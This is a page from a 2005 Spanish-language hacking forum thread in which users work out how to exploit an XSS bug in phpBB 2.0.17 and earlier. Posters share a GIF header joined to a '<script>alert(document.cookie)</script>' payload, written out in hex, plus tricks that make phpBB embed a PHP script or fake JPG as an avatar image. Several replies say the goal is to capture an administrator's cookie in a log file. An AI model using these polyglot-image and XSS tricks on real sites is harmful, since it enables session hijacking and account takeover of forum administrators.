elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Nuevo bug en los phpbb<=2.0.17
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Nuevo bug en los phpbb<=2.0.17  (Leído 19,692 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.143

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #20 en: 8 Noviembre 2005, 01:54 am »

http://foro.elhacker.net/index.php/topic,89986.0.html

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
manware

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #21 en: 8 Noviembre 2005, 21:06 pm »

Gracias Mousehack pero en el topic que me pasaste no se encuentra la cadena hexadecimal, y el ejemplo al cual haces referencia no se puede acceder.

Más concretamente, podria tomar los 14 primeros caracteres de cualquier GIF y eso sería la cabecera?.
En línea

jeancarl00

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #22 en: 9 Noviembre 2005, 19:04 pm »

a mi me pasa esto cuando subo el avatar
Código:
El avatar debe tener menos de 100 pixels de ancho por 100 pixels de alto
alguna idea para poder pasar los tamaños q te imponen


-----------------------------------------------------------------
encontre una donde me dejo subir el avatar
y cree un post donde me respondio el admin
pero no veo el log.txt en mi ftp
« Última modificación: 9 Noviembre 2005, 20:49 pm por jeancarl00 » En línea

Dinio_Albino

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #23 en: 9 Noviembre 2005, 21:39 pm »

a mi me pasa esto cuando subo el avatar
Código:
El avatar debe tener menos de 100 pixels de ancho por 100 pixels de alto
alguna idea para poder pasar los tamaños q te imponen


-----------------------------------------------------------------
encontre una donde me dejo subir el avatar
y cree un post donde me respondio el admin
pero no veo el log.txt en mi ftp


Es que a mi tampoco me crea el log, no se porque...
En línea



manware

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #24 en: 10 Noviembre 2005, 04:26 am »

Antes de crear el LOG fijense si funciona un simple ALERT para probar si la vulnerabilidad realmente funciona.

Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado...

Al menos eso creo...

Yo aún no he visto que ese exploit funcione...

En línea

mousehack


Desconectado Desconectado

Mensajes: 1.143

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #25 en: 11 Noviembre 2005, 02:33 am »

Antes de crear el LOG fijense si funciona un simple ALERT para probar si la vulnerabilidad realmente funciona.

Teniendo en cuenta que en realidad se trata de una omision de IE es posible que quienes visiten el post con el exploit tengan en su explorador el parche adecuado...

Al menos eso creo...

Yo aún no he visto que ese exploit funcione...



podriamos probar poniendo la supuesta imagen en hexa, a ver si funciona (yo no tengo foro en q probar... :))
por ejemplo:
la cabecera del gif:
Código:
47 49 46 38 39 61 01 00 01 00
y un simple alert:
Código:
<HTML><HEAD><SCRIPT>alert(document.cookie);</SCRIPT></HEAD></HTML>
en hexa:
Código:
47 49 46 38 39 61 01 00 01 00 3C 48 54 4D 4C 3E 3C 48 45 41 44 3E 3C 53 43
52 49 50 54 3E 61 6C 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F 6B 69
65 29 3B 3C 2F 53 43 52 49 50 54 3E 3C 2F 48 45 41 44 3E 3C 2F 48 54 4D 4C
3E

en este caso probamos como cabecera del GIF
Código:
GIF89a_--.

para probar (unicamente con IE, con firefox no funciona)

http://planet.nana.co.il/mycoolpictures123/fake/lt2.jpg

PD:adapatacion de un texto de K-Gen

Salu2

« Última modificación: 11 Noviembre 2005, 02:53 am por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Dinio_Albino

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #26 en: 11 Noviembre 2005, 18:38 pm »

Yo cree este foro, podeís utilizarlo: http://usuarioslycos.es/ivaneilu/phpBB2/index.php


Pruebalo tu, mousehack, y luego nos cuentas.

PD: Por cierto, probé a poner la url del GIF, y si me saltaba la alerta con la cokiee y todo eso, pero lo suyo es que se quedé guardada en el log.txt.
En línea



Eeprom_One

Desconectado Desconectado

Mensajes: 59


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #27 en: 11 Noviembre 2005, 23:54 pm »

saludos al foro. soy newbie!! Lamers no me jodais ehhhh!!!!

bueno a lo k vamos.....el log.txt no te lo guarda ya que el gif del ejemplo no tiene ese codigo....es de prueba solo para el alert....¿¿¿¿??? need help, pleaze.

grettings to allz!!!!!

xDinio_Albino...lel link no rulez!!!!
En línea

mousehack


Desconectado Desconectado

Mensajes: 1.143

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #28 en: 12 Noviembre 2005, 13:04 pm »

veamos otra prueba ;)

si queremos insertar una imagen en un phpbb y tenemos en nuestro server un archivo que queremos que se ejecute por ejemplo:
Código:
http://miserver/archivo.php

como hacemos para insertarlo sin crear un GIF modificado???
simplemente agregando al final del archivo:
Código:
/test.jpg
/test.jpeg
/test.gif
/test.png
phpbb pensara que es una imagen verdadera no un archivo php

otra posibilidad:

nos vamos a nuestro server y creamos un archivo lamado por ejemplo ¨PRUEBA.JPG¨ y dentro del mismo pones lo que quieres que se ejecute, luego pones en la web phpbb:
Código:
[img=http://tuserver.com/prueba.jpg] 

Salu2

PD:teoricamente vulnerable de la version 2.0.0 a la 2.0.18
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Joker_dxz


Desconectado Desconectado

Mensajes: 315


The imposible is nothing


Ver Perfil WWW
Re: Nuevo bug en los phpbb<=2.0.17
« Respuesta #29 en: 12 Noviembre 2005, 14:07 pm »

y una vez echo eso que pasa??

el admin si ve mi supuesto avatar,le roba la cookie??
En línea


Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error en phpBB - Ayuda
Desarrollo Web
victorius 0 2,341 Último mensaje 28 Noviembre 2020, 18:18 pm
por victorius
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines